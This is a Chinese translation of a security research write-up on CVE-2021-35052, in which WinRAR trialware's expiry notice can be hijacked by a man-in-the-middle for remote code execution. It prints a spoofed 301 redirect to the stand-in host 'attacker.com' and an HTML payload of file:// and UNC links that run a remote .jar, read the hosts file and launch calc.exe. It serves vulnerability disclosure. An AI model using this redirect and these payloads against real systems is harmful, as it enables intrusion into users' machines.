WinRAR 试用版曝漏洞:免费软件并不“免费“

dc7f62f7d93d0b8da2569f70798d76b3.gif 聚焦源代码安全,网罗国内外最新资讯!

作者:Igor Sak-Sakovskiy

编译:代码卫士团队

8445d7fc830b0f8c19b8857e7c4af7d1.png

本文讨论的是位于 WinRAR 试用版中的一个漏洞,它对管理第三方软件具有重大影响。该漏洞可导致攻击者拦截并修改发送到该试用版用户的请求,从而在用户计算机实现远程代码执行。该漏洞的编号为 CVE-2021-35052。

e44b63e311f77178eb49f2e599e38eba.png

背景

9353a3f5a88b3c502a2afefbaa66ed24.png

WinRAR 是一款用于管理 Windows 操作系统上文档文件的应用程序,可创建并解压缩常见文档格式如 RAR 和 ZIP。WinRAR 以试用软件的形式分发,可使用户在规定期限内试用全部功能,期限过后用户可能还可以使用该应用,不过某些特性会被禁用。

ad5f402b3ca1fa67fc07ee1a1b9c17c5.png

研究结果

4e2f98d1e545dbd671adbc5934a72448.png

研究人员指出,这个漏洞是偶然从 WinRAR 版本 5.70 中发现的。他们安装并使用一段时间后,WinRAR 生成一个 JavaScript错误:

7f3a50d43be61fca77eaa61ba66babc1.png

这一结果让人惊讶,因为该错误表明 IE 引擎正在渲染该错误窗口。经过几次实验后,研究人员发现一旦试用期结束,则大概在每三次启动 WinRAR.exe 应用中,有一次就会出现这个通知窗口。该窗口使用的是 Borland C++ 的 mshtml.dll 实现,这也是编写 WinRAR 的语言。

b7089e8d8601ff9d13afb4fde76ad09c.png

研究员将本地 Burp Suite 作为默认的 Windows 代理并尝试拦截流量以及了解错误发生的原因以及是否利用该错误。由于请求是通过 HTTPS 发送的,因此 WinRAR 用户将收到关于Burp所使用的自签名证书不正确的通知。然而,很多用户会点击 “Yes” 继续使用该应用。

0e0ed94493d14652f4825f2fd99d631d.png

从请求本身可看到WinRAR 应用程序的版本 (5.7.0) 和架构 (x64):

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com 
Connection: close
Cookie: _wr=; _gid=; _ga=

8921debfc6bafd2bcaed556e87515793.png

修改对终端用户的请求

443d53f55ba84f35d4e98817e3a84527.png

接着,研究员尝试修改 WinRAR 向用户发送的响应。研究人员并非每次都会使用恶意内容拦截并更改默认域名 “notifier.rarlab.com” 的响应,而是注意到如果响应代码被更改为 “301 永久移除“,之后重定向恶意域名 “attacker.com” 会被缓存,而所有请求将会去往 “attacker.com”。

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close

da538e01a790dcbaae88ae61f7d358d7.png

远程代码执行

1cafcf18c0fa299fd124db04f2c125b7.png

这种中间人攻击要求进行 ARP 欺骗,因此假定潜在攻击者已经能够访问该网络域名,则会将研究员置于 IE 安全区域的 Zone 1。研究人员通过多种不同的攻击向量查看是否适用于这种访问权限。

<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>

如上代码说明了展现多种可能的攻击向量的被欺骗响应,这些向量包括运行应用程序、检索本地主机信息以及运行计算器应用程序。

24b42e308517febb2df7220b80d95258.png

多数攻击向量是成功的,但应当注意到很多攻击向量会触发额外的 Windows 安全警告信息。要达到全面成功,需要用户点击“运行“而非”取消‘。

c76108c9602994427d8667772eaf45cd.png

然而,运行某些文件类型时并不会出现安全警告信息,包括:.DOCX、.PDF、.PY 和 .RAR。

32cdc8976e998fa71071ec33678832a4.png

在 WinRAR 5.7 之前的版本中,利用漏洞 CVE-2018-20250 还可以实现远程代码执行后果。

c2b859526bfe6844200ef7487cd4d351.png

结论

6b1905870e41fcf700ab19ace5f94802.png

组织机构面临的最大挑战之一是管理第三方软件。一旦安装后第三方软件就能够读、写和修改设备上的数据,而这些设备能够访问企业网络。用户不可能审计每个应用程序是否可安装,因此制定相关策略对于管理外部应用程序相关风险以及平衡多种应用程序的业务需求和风险就显得十分重要。管理不当可造成影响广泛的后果。


推荐阅读

WinRAR 被曝已存在19年的RCE 漏洞,影响全球5亿用户

勒索软件CTB-Faker使用WinRAR将数据锁定为带有密码保护的ZIP文件

第三方攻击在增长但风险管理跟不上

原文链接

https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

818213afcd2d99ea5242237acdd0be03.png

e811e8849140e55734f5191ffd37545d.png

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

   8b9801c64f5e86083445718a0c3caad3.gif 觉得不错,就点个 “在看” 或 "赞” 吧~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值